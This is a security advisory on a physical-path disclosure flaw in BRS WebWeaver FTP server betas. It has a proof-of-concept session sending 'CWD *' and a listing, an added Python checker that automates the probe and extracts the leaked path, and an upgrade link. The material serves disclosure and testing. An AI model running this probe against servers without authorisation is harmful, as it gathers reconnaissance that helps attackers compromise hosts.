
BRS WebWeaver FTP Server Physical Path Disclosure Vulnerability


Published: 2001-05-07
Updated: 2001-05-07
Severity:
Threat type: server information disclosure
Error type: input validation error
Exploit mode: server-side (remote)

Affected Systems
BRS WebWeaver 0.62beta
BRS WebWeaver 0.61beta
BRS WebWeaver 0.60beta
BRS WebWeaver 0.52beta
BRS WebWeaver 0.51beta
BRS WebWeaver 0.50beta
BRS WebWeaver 0.49beta
Description
BRS WebWeaver is a combined FTP and web server. Its FTP server contains a flaw
that allows a remote FTP user to learn the physical (on-disk) path of the FTP
root directory. The server accepts a CWD (cd) command whose argument is the
wildcard "*" and reports "/*/" as the current directory; a subsequent directory
listing then fails, and the error text the server sends back over the data
connection contains the server's local path (for example a "c:\..." path),
which reveals where the FTP root lives on the filesystem. The disclosed path is
useful to an attacker as a building block for further attacks on the host.

Proof of Concept
(courtesy Joe Testa <joetesta@hushmail.com>):

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
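The following checker is an added example and is not part of the original advisory or of BRS WebWeaver. It reproduces the sequence in the session above (log in, send "CWD *", then "LIST") with Python's ftplib and extracts the leaked local path from the listing output. The host, credentials and timeout passed to probe() are assumptions for illustration; parse_leaked_root() runs offline against a constructed copy of the data-connection line from the transcript.

```python
# Added example (not the advisory's or the vendor's code): checker for the
# BRS WebWeaver FTP path-disclosure behaviour. Host/credentials are assumed.
import ftplib
import re
import sys
from typing import List, Optional

# A Windows absolute path: drive letter, then backslash-separated components.
# '*' is excluded from a component so the match stops before the "\*\*.*"
# that the server appends after our "CWD *".
_WIN_PATH = re.compile(r'([A-Za-z]:\\(?:[^\\\r\n*?<>|"]+\\)*)')

# Constructed sample: the data-connection output seen in the PoC transcript.
SAMPLE_LISTING = "c:\\windows\\desktop\\*\\*.* not found\r\n"


def parse_leaked_root(listing: str) -> Optional[str]:
    """Return the physical FTP root path if the LIST output leaks one.

    A server that returns an ordinary listing, or an error without a local
    path, yields None.
    """
    for line in listing.splitlines():
        m = _WIN_PATH.search(line)
        if m:
            return m.group(1).rstrip("\\")
    return None


def probe(host: str, user: str, password: str,
          timeout: float = 10.0, passive: bool = False) -> Optional[str]:
    """Log in, send CWD * then LIST, and return any leaked local path.

    Returns None when the server rejects "CWD *" (a fixed server should) or
    when the listing contains no local path. The PoC used active mode (PORT),
    so passive defaults to False; set passive=True if you are behind NAT.
    """
    ftp = ftplib.FTP()
    ftp.connect(host, 21, timeout=timeout)
    try:
        ftp.login(user, password)
        ftp.set_pasv(passive)
        try:
            ftp.cwd("*")          # vulnerable builds answer 250 and report "/*/"
        except ftplib.error_perm:
            return None           # rejected wildcard: not the vulnerable behaviour
        lines: List[str] = []
        try:
            ftp.retrlines("LIST", lines.append)
        except ftplib.all_errors:
            pass                  # the path may already have been sent before an error
        return parse_leaked_root("\n".join(lines))
    finally:
        ftp.close()


if __name__ == "__main__":
    # Assumed usage: python webweaver_check.py HOST USER PASSWORD
    if len(sys.argv) == 4:
        leaked = probe(sys.argv[1], sys.argv[2], sys.argv[3])
    else:
        leaked = parse_leaked_root(SAMPLE_LISTING)
    print("leaked FTP root: %s" % leaked if leaked else "no local path disclosed")
```

The extractor only recognises Windows drive-letter paths because that is the only form the advisory demonstrates; treat a None result from probe() as "not reproduced", not as proof the server is patched.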

Solution
Upgrade to a fixed release. For every affected version (0.49beta, 0.50beta,
0.51beta, 0.52beta, 0.60beta, 0.61beta and 0.62beta) the vendor upgrade is the
same:

BRS WebWeaver 0.63 beta (WebWeaver063.exe)
http://members.nbci.com/_XMCM/BSoutham/download/WebWeaver063.exe

Related Information